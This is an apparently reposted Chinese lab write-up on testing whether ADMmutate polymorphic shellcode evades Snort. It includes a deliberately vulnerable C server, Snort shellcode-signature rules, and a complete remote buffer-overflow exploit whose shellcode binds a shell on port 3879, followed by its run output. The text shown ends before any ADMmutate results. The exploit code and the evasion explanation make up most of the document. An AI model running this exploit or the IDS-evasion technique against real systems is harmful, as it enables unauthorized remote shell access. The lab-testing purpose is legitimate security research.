利用ADMmutate測試NIDS

前言：
 ?????????
只是一個試驗，用了三臺機器，兩臺機器跑linux （vmware下的RedHat6.2，同事的機子，借用：）一臺機器裝NIDS（snort1.8-WIN32）
其中：
server IP： 192.168.100.170
client IP： 192.168.100.171
NIDS? IP： 192.168.100.172

目的：
 ??想試試利用ADMmutate是否可以逃過NIDS的監視進行遠程緩沖區溢出？NIDS是否可以通過配 置來發現這種攻擊！

ADMmutate的介紹：

 ??這個程序的作者是k2，利用了名為多形態代碼的技術，使攻擊者能夠潛在的改變代碼結構來欺騙許? 多入侵檢測系統，但它不會破壞最初的攻擊性程序。溢出程序經它一改，就可以搖身一變，而且由于采用了動態改變的技術，每次偽裝的shellcode都不相同,本來ids依靠提取公開的溢出程序的特征碼來檢測報警，特征碼變了后ids就檢測不到了。

 ? 偽裝前的shellcode格式為：
 ???? [NNNNNNNNNNNNN][SSSS][RRRR]
 ? 偽裝后的shellcode格式為：
 ???? [nnnnnnn][dddd][ssss][rrrr]
 ? 其中：
 ????N表示NOP，S表示shellcode，R表示返回地址；
 ????n表示經過編碼的NOP，d為解碼器，s表示經過編碼的shellcode，r表示返回地址。
 ?????
  （ADMmutate在k2的主頁上有下載：
 ??????http://www.ktwo.ca/c/ADMmutate-0.7.3.tar.gz????）
 ??????
測試過程：
 
（下面的程序涉及到遠程緩沖區溢出，如不明白請看《高級緩沖區溢出下》或《怎樣寫遠程緩沖區溢出漏洞利用程序 》）

1.服務器端運行有漏洞的服務器程序(vulnerable)
 ?//-------------有漏洞的服務器程序(vulnerable.c)-------------------
#include <stdio.h>
#include <.netdb.h>
#include <netinet/in.h>


#define BUFFER_SIZE 1024
#define NAME_SIZE 2048


int handling(int c)

{
 ??? char buffer[BUFFER_SIZE], name[NAME_SIZE];
 ??? int bytes;
 ??? strcpy(buffer, "My name is: ");
 ??? bytes = send(c, buffer, strlen(buffer), 0);
 ??? if (bytes == -1)
 ????? return -1;
 ??? bytes = recv(c, name, sizeof(name), 0);
 ??? if (bytes == -1)
 ????? return -1;
 ??? name[bytes - 1]= '0';
 ??? sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
 ??? bytes = send(c, buffer, strlen(buffer), 0);
 ??? if (bytes == -1)
 ????? return -1;
 ??? return 0;

}


int main(int argc, char *argv[])

{
 ??? int s, c, cli_size;
 ??? struct sockaddr_in srv, cli;
 ??? if (argc != 2)
 ??? {
 ???????fprintf(stderr, "usage: %s port\n", argv[0]);
 ????? return 1;
 ??? }
 ??? s = socket(AF_INET, SOCK_STREAM, 0);
 ??? if (s == -1)
 ??? {
 ????? perror("socket() failed");
 ????? return 2;
 ??? }
 ??? srv.sin_addr.s_addr = INADDR_ANY;
 ??? srv.sin_port = htons( (unsigned short int) atol(argv[1]));
 ??? srv.sin_family = AF_INET;
 ??? if (bind(s, &srv, sizeof(srv)) == -1)
 ??? {
 ????? perror("bind() failed");
 ????? return 3;
 ??? }
 ??? if (listen(s, 3) == -1)
 ??? {
 ????? perror("listen() failed");
 ????? return 4;
 ??? }
 ??? for(;;)
 ??? {
 ????? c = accept(s, &cli, &cli_size);
 ????? if (c == -1)
 ????? {
 ??????? perror("accept() failed");
 ??????? return 5;
 ????? }
 ????? printf("client from %s", inet_ntoa(cli.sin_addr));
 ??? if (handling(c) == -1)
 ????? fprintf(stderr, "%s: handling() failed", argv[0]);
 ??? close(c);
 ??? }
 ??? return 0;

}

-----------------------------------------------------------------------
server:~/ > gcc vulnerable.c -o vulnerable
server:~/ > ./vulnerable 5555&
 ?
 ?（現在該程序監聽5555端口并等待連接）
 ?
2.安裝NIDS的機器運行snort：
 ?D:\Tools\Defence\snort>snort -A fast -l log -c shellcode.rules
 ?其中：
 ?shellcode的規則包括：
 ?alert tcp any any -> any any (msg:"SHELLCODE x86 NOP"; content: "|90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; depth: 128; reference:arachnids,181; classtype:bad-unknown; sid:648; rev:2;)
 ?//此規則主要通過對shellcode中的大量NOP進行判斷
 ?alert tcp any any -> any any (msg:"SHELLCODE linux shellcode"; content:"/bin/sh";?reference:arachnids,343; classtype:attempted-admin; sid:652; rev:2;)
 ?//此規則主要通過對shellcode中的字符串/bin/sh進行判斷
 ?alert tcp any any -> any any (msg:"SHELLCODE x86 stealth NOP";? content: "|eb 02 eb 02 eb 02|"; reference:arachnids,291; classtype:bad-unknown; sid:651; rev:2;)
 ?//此規則主要通過對shellcode中的用來替換NOP的jmp 0x02（十六進制為eb 02）進行判斷。采用eb 02替換NOP只要是為了躲避一些通過NOP來判斷是否溢出的NIDS的檢測。
 ?
3.客戶端運行正常的遠程緩沖區溢出程序exploit
//----------------- 正常的exploit.c ----------------------------------

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>

#define SIZE? 2048
#define NOPDEF 861

char shellcode[] =

"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"?
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
（一個將shell綁定在3879（\x0f\x27\）端口的shellcode?。?

unsigned long get_sp(void)
{
 ? __asm__("movl %esp,%eax");
}


int main(int argc, char *argv[])
{

 ? char buffer[SIZE];
 ? int s, i, size, offset;
 ? unsigned long addr;
 ? struct sockaddr_in remote;
 ? struct hostent *host;
 ? int nop=NOPDEF;

 ? if(argc != 4) {
 ??? printf("Usage: %s target-ip port offset\n", argv[0]);
 ??? return -1;
 ? }

 ? offset=atoi(argv[3]);
 ? addr=get_sp()-offset;
 ? printf("Jump to 0x%08x\n",addr);

 ? memset(buffer,0x90,SIZE);
 ? memcpy(buffer+nop,shellcode,strlen(shellcode));
 ? for (i = nop+strlen(shellcode); i < SIZE-4; i += 4){
 ??? * ((unsigned long *) &buffer[i]) = addr;
 ? }
 ? buffer[2047] = 0x0;
 ? printf("%s\n",buffer);

 ??? //getting hostname
 ? host=gethostbyname(argv[1]);
 ? if (host==NULL){
 ??? fprintf(stderr, "Unknown Host %s\n",argv[1]);
 ??? return -1;
 ? }

 ??? // creating socket...
 ? s = socket(AF_INET, SOCK_STREAM, 0);
 ? if (s < 0){
 ??? fprintf(stderr, "Error: Socket\n");
 ??? return -1;
 ? }

 ??? //state Protocolfamily , then converting the hostname or IP address, and getting?port number
 ? remote.sin_family = AF_INET;
 ? remote.sin_addr = *((struct in_addr *)host->h_addr);
 ? remote.sin_port = htons(atoi(argv[2]));

 ??? // connecting with destination host
 ? if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1){
 ??? close(s);
 ??? fprintf(stderr, "Error: connect\n");
 ??? return -1;
 ? }

 ??? //sending exploit string
 ? size = send(s, buffer, sizeof(buffer), 0);
 ? if (size==-1){
 ??? close(s);
 ??? fprintf(stderr, "sending data failed\n");
 ??? return -1;
 ? }
 ??? // closing socket
 ? close(s);

}
-------------------------------------------------------------------
client:~/ > gcc exploit.c -o exploit
client:~/> ./exploit 192.168.100.170 5555 200
Jump to 0xbffff220
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙
悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悏?也f壭1蓧薈塢鳦
塢鬕塎鼚M敉

原文轉自：http://www.kjueaiud.com